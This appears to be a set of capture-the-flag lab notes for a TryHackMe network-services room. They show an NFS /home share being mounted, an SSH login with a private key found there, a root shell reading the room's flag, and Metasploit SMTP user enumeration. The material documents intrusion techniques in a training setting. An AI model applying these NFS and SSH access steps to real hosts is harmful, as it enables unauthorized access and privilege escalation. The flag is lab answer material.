# Task 3

Port Scanning with nmap

```
root@kali-virtualbox:~# /usr/sbin/showmount -e 10.10.93.52
Export list for 10.10.93.52:
/home *
```

```
root@kali-virtualbox:/tmp/mount# showmount -e 10.10.93.52
Export list for 10.10.93.52:
/home *
root@kali-virtualbox:/tmp/mount# mount -t nfs 10.10.93.52:/home /tmp/mount -nolock
root@kali-virtualbox:/tmp/mount# ;s
bash: syntax error near unexpected token `;'
root@kali-virtualbox:/tmp/mount# ls
cappucino
root@kali-virtualbox:/tmp/mount# 


```

```
root@kali-virtualbox:~/GitLab/Offensive-Security/TryHackMe/NetworkServices/NetworkServices2# ssh -i id_rsa cappucino@10.10.93.52
load pubkey "id_rsa": invalid format
The authenticity of host '10.10.93.52 (10.10.93.52)' can't be established.
ECDSA key fingerprint is SHA256:YZbI4MCk+BQgHK2gc4cdmXuPTzO6m8CtiVRkPalFhlU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.93.52' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat May  8 18:15:33 UTC 2021

  System load:  0.0               Processes:           101
  Usage of /:   45.2% of 9.78GB   Users logged in:     0
  Memory usage: 16%               IP address for eth0: 10.10.93.52
  Swap usage:   0%


44 packages can be updated.
0 updates are security updates.


Last login: Thu Jun  4 14:37:50 2020
cappucino@polonfs:~$ 


```



```
bash-4.4# whoami
root
bash-4.4# id
uid=1000(cappucino) gid=1000(cappucino) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),1000(cappucino)
bash-4.4# cat /root/root.txt 
THM{nfs_got_pwned}
bash-4.4# 


```


```
msf5 auxiliary(scanner/smtp/smtp_enum) > run

[*] 10.10.152.228:25      - 10.10.152.228:25 Banner: 220 polosmtp.home ESMTP Postfix (Ubuntu)
[+] 10.10.152.228:25      - 10.10.152.228:25 Users found: administrator
[*] 10.10.152.228:25      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smtp/smtp_enum) > 


```